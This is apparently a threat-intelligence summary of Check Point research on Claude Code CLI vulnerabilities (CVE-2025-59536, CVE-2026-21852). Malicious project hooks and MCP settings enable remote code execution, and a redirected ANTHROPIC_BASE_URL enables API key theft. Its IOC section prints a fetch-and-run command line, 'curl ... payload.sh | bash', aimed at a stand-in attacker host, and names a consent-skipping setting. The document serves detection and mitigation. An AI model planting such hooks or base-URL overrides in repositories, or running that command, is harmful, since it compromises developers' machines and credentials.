Caught in the Hook: RCE and API Token Exfiltration Through Claude Code Project Files | CVE-2025-59536 | CVE-2026-21852
Check Point Research discovered critical vulnerabilities in Anthropic's Claude Code CLI that enable Remote Code Execution (RCE) and API token exfiltration. By injecting malicious configurations into project files like .claude/settings.json and .mcp.json, attackers could execute arbitrary commands and steal API keys when a developer opens a compromised repository, leading to potential supply chain attacks and unauthorized access to shared Claude Workspaces.
Authors: Aviv Donenfeld, Oded Vanunu
Source:
Check Point
- filename.claude/settings.jsonClaude Code configuration file abused to store malicious hooks and environment variables for RCE and API key exfiltration.
- filename.mcp.jsonModel Context Protocol configuration file abused to execute arbitrary commands upon initialization.
- urlhxxp://attacker-server[.]comExample malicious server URL used in the PoC for API key exfiltration via the ANTHROPIC_BASE_URL variable.
- urlhxxp://attacker-server[.]com/payload.shExample malicious payload URL used in the PoC for RCE via Claude Code Hooks.
Key Takeaways
- Critical vulnerabilities in Anthropic's Claude Code allowed RCE and API token exfiltration via malicious project configuration files.
- Attackers exploited Hooks and MCP (Model Context Protocol) server settings to execute arbitrary commands without explicit user consent.
- Modifying the ANTHROPIC_BASE_URL environment variable in project settings allowed attackers to steal plaintext Anthropic API keys.
- Stolen API keys could be abused to access, modify, or delete sensitive files within shared Claude Workspaces.
- Anthropic has patched all reported vulnerabilities; users must update to the latest version of Claude Code.
Affected Systems
- Claude Code CLI
- Developer Workstations
- Anthropic Workspaces
Vulnerabilities (CVEs)
- CVE-2025-59536
- CVE-2026-21852
- GHSA-ph6w-f82w-28w6
Attack Chain
An attacker injects malicious configurations into a repository's .claude/settings.json or .mcp.json files. When a victim clones and opens the repository using Claude Code, the CLI automatically processes the configurations. This triggers either the execution of arbitrary shell commands via Hooks/MCP servers without explicit consent, or the exfiltration of the victim's Anthropic API key by redirecting API traffic to an attacker-controlled server via the ANTHROPIC_BASE_URL environment variable. The attacker can then use the stolen API key to access, modify, or delete sensitive files within the victim's shared Claude Workspaces.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules, focusing instead on the vulnerability mechanisms, PoC demonstrations, and vendor patches.
Detection Engineering Assessment
EDR Visibility: Medium — EDR can monitor child processes spawned by the Claude Code CLI (e.g., node/claude spawning bash or curl), but might not inspect the configuration files directly. Network Visibility: Medium — Network monitoring could detect Claude Code communicating with non-Anthropic domains, but the traffic itself is likely encrypted HTTPS. Detection Difficulty: Moderate — Distinguishing legitimate developer activity (which often involves running scripts and connecting to various servers) from malicious hook execution requires baseline knowledge of normal Claude Code behavior.
Required Log Sources
- Process Creation Logs (Event ID 4688 / Sysmon Event ID 1)
- DNS Query Logs
- Network Connection Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for the Claude Code process spawning unexpected shell interpreters or network utilities like curl/wget, which may indicate malicious hook execution. | Process Creation | Execution | Medium |
| Monitor for network connections from the Claude Code process to unknown or untrusted external IP addresses or domains, indicating potential API key exfiltration. | Network Traffic | Exfiltration | Medium |
Control Gaps
- Lack of strict validation on project-level configuration files
- Implicit trust of environment variables defined in repository files
Key Behavioral Indicators
- Claude Code process ancestry showing unexpected child processes
- Modifications to .claude/settings.json or .mcp.json introducing new hooks or base URLs
False Positive Assessment
- Medium
Recommendations
Immediate Mitigation
- Update Claude Code to the latest patched version immediately.
Infrastructure Hardening
- Implement network egress filtering to restrict Claude Code API traffic strictly to known Anthropic endpoints.
User Protection
- Inspect .claude/ and .mcp.json configuration directories before opening untrusted projects.
- Do not blindly accept trust dialogs when initializing new projects in Claude Code.
Security Awareness
- Educate developers on the risks of repository-level configuration files acting as executable code.
- Incorporate configuration file reviews into standard code review processes.
MITRE ATT&CK Mapping
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools
- T1552.001 - Unsecured Credentials: Credentials In Files
Additional IOCs
- Domains:
attacker-server[.]com- Example attacker domain used in PoC configurations.
- Command Lines:
- Purpose: Execute reverse shell or malicious script via Claude Code Hooks | Tools:
curl,bash| Stage: Execution |curl -s http://<attacker-ip>/payload.sh | bash - Purpose: Open calculator as a PoC for RCE via Hooks and MCP | Tools:
open| Stage: Execution |open -na Calculator
- Purpose: Execute reverse shell or malicious script via Claude Code Hooks | Tools:
- Other:
ANTHROPIC_BASE_URL- Environment variable abused to redirect API traffic and exfiltrate API keys.enableAllProjectMcpServers- Configuration parameter abused to bypass user consent for MCP server initialization.